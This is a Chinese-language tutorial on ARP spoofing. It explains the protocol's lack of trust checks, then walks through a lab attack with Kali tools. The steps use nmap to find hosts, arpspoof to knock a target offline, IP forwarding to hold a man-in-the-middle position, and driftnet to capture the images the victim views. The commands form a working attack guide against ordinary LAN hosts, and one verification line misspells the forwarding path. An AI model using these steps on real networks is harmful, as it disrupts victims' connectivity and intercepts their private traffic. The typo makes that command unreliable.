ARP断网攻击与监听

ARP断网攻击与监听 ARP欺骗

1、ARP协议：地址解析协议

根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机，并接收返回消息，以此确定目标的物理地址；收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间，下次请求时直接查询ARP缓存以节约资源。

2、ARP欺骗

地址解析协议是建立在网络中各个主机互相信任的基础上的，局域网络上的主机可以自主发送ARP应答消息，其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存；由此攻击者就可以向某一主机发送伪ARP应答报文，使其发送的信息无法到达预期的主机或到达错误的主机，这就构成了一个ARP欺骗
由于ARP缓存表不是实时更新的，如果在网络中产生大量的ARP通信量，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击

ARP断网攻击

1、查看攻击机的IP地址(192.168.63.131)、网关(192.168.63.2)等信息
ifconfig

route -n

2、使用Nmap扫描局域网中存活的主机的信息
nmap -sP 192.168.63.0/24

3、攻击未开始前，目标主机访问网站正常

4、在kali终端执行arpspoof命令,开始ARP断网攻击
arpspoof -i eth0 -t 192.168.63.128(目标IP) 192.168.63.2(网关IP)

5、此时目标主机已经无法正常连接互联网，访问百度后如下

6、在kali终端终端欺骗，目标主机可恢复正常访问互联网

ARP中间人攻击(图片窃取) 端口转发

1、IP端口转发
echo 1 > /proc/sys/net/ipv4/ip_forward
输出1说明成功开启IP转发
cat /proc/sys/net/ipv4/ip_foward

2、重新执行arpspoof命令，此时目标主机能正常联网，端口转发成功

图片获取

1、开启arp欺骗

2、另开启一个终端执行driftnet命令，该命令会自动获取目标主机浏览的图片并保存到kali虚拟机的/home/ices/arptest路径下
driftnet -i eth0 -a -d /home/ices/arptest